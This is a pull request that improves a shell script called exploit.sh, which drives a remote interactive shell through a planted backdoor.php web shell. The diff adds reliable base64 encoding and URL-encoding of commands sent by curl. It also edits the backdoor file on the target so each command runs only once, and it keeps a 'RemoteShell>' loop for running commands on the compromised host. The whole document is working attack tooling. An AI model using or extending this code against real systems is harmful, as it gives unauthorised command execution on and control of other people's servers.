### PR TITLE
Script cleanups.

### DIFF
--- a/exploit.sh
+++ b/exploit.sh
@@ -13,9 +13,11 @@ fi
 if [ $(uname) == 'Darwin' ]
 then
     decoder='base64 -D'
+    encoder='base64 -b0'
 elif [ $(uname) == 'Linux' ]
 then
-    decoder='base64 -d'  
+    decoder='base64 -d'
+    encoder='base64 -w0'
 else
     echo '[-] Your platform isnt supported: '$(uname)
     exit -1
@@ -40,16 +42,26 @@ else
     echo '[+] Backdoor.php found on remote system'
 fi
 
-cmd='whoami'
+echo '[+] Tidying backdoor script to only run everything once'
+cmd="awk '/\<\?php/{c++;if(c>1){sub(\"<?php\",\"<?ignored-php\")}}1' < /www/backdoor.php > /www/backdoor.php.new && mv /www/backdoor.php.new /www/backdoor.php"
+if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | $encoder | sed -e 's/+/%2b/g' | sed -e 's/\//%2f/g') | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder
+then
+    echo '[-] Connection problens'
+    exit -1
+fi
+
+cmd=''
 while [ "$cmd" != 'exit' ]
 do
-    echo '[+] Running '$cmd
-    if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder 
-    then
-        echo '[-] Connection problens'
-        exit -1
+    if [[ ! -z "${cmd// }" ]]; then
+	echo '[+] Running '$cmd
+	if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | $encoder | sed -e 's/+/%2b/g' | sed -e 's/\//%2f/g') | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder
+	then
+            echo '[-] Connection problens'
+            exit -1
+	fi
+	echo
     fi
-    echo
     read -p 'RemoteShell> ' cmd
 done
 echo '[+] Exiting'


### PR DESCRIPTION
 - Make sure long command lines don't get base64-wrapped by using base64
   -b0/-w0 (depending on platform)
 - The initial backdoor.php file has multiple <?php blocks, meaning that
   each command is actually run multiple times. Tidy this up by
   modifying backdoor.php to only leave one <?php block intact.
 - URL-encode + and / characters from the base64-encoded command.
 - Skip empty commands.